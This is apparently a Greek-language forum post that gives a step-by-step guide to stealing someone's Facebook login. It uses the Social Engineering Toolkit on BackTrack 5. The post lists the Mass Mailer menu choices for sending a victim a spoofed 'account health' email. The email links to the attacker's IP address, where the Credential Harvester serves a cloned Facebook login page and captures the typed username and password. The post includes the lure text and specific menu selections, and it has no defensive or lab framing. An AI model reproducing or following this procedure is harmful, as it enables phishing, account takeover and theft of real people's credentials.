Link --> https://www.youtube.com/watch?v=FBSSM_0yKvo
Σε αυτό το post θα εξηγήσω πως μπορούμε να αποκτήσουμε το Username και το Password του λογαριασμού του στο Facebook.
Για να το πραγματοποιήσουμε θα χρειαστούμε 2 εργαλεία που εμπεριέχονται στο λειτουργικό σύστημα BackTrack 5 R1.
Πρόκειται:
Α) Για το Mass Mailer
Β) Το Harvester Attack Vector
Με το πρώτο στέλνω email στο θύμα μου με το link του κλώνου της εισόδου της σελιδας του Facebook (δημιουργία Fake site). Και αφού κάνω αυτό μετά χρησιμοποιώ το Harvester Attack Vector.
Terminal: cd pentest/exploits/set ↵
./set ↵
*Αυτό μπορεί να γίνει και από το μενού του backtrack 5 ακολουθόντας τη διαδρομή Bt5 --> explotation tools --> social engineering tools --> set
Α) Χρησιμοποίηση του Mass Mailer για αποστολή μυνήματος στο θύμα...
Terminal: 5 ↵ [Mass Mailer Attack]
1 ↵ [E-Mail Attack Single E-mail Address]
Enter who you want to send e-mail to: victim_e-mail@gmail.com ↵
1 ↵ [Enter my_e-mail@hotmail.com]
[Enter my password e-mail]
Enter subject of your email: Reminder ↵
1 ↵ [HTML] or 2 ↵ [Plain] --> Επιλέγω 2 ↵
Next line of the body: This message is an important for your facebook account health. Please update your account so that we present it for hacking attacks. Please follow the link below to update your account.
http://(my ip address)
Regards
^C ↵ (Ctrl + C)
Αυτό που καταφέραμε να κάνουμε με το Mass Mailer είναι να στείλουμε ένα μήνυμα στο θύμα στο οποίο του λέμε να μπεί και να κάνει επιβεβαίωση το λογαριασμό του.
Β) Σε αυτό το στάδιο χρησιμοποιούμε το Credential Harvester Attack.
Terminal: cd pentest/exploits/set ↵
./set ↵
*Αυτό μπορεί να γίνει και από το μενού του backtrack 5 ακολουθόντας τη διαδρομή Bt5 --> explotation tools --> social engineering tools --> set
Στη συνέχεια ακολουθούμε:
Terminal: 2 ↵
3 ↵
1 ↵
4 ↵
Στο σημείο αυτό θα μας βγάλει ''Press {return} to continue'' πατάμε enter και μας βγάζει τρεις σειρές με μπλε γράμματα. Όταν το θύμα ανοίξει το link που του στείλαμε τότε ανοίγει η σελίδα του κλώνου του facebook που δημιουργήσαμε και αυτός όταν πληκτρολογίσει το username – password τότε κοιτάμε στο terminal και μας δείχνει τι πληκτρολόγισε. Έτσι αποκτάμε πρόσβαση στο λογαριασμό του.
Περισσότερες λεπτομέρειες στο βίντεο του link! Αν υπάρχουν διορθώσεις η επιπλέον προσθήκες στο post ας αναρτηθούν
*ΣΗΜΕΙΩΣΗ: Θα πρέπει πρώτα να δημιουργήσουμε server για να μπορέσει το θύμα να ανοιξει το link που δημιουργήσαμε. Παιδιά Term, Legend κτλ διορθώστε με αν λέω κάτι λάθος.
Ευχαριστώ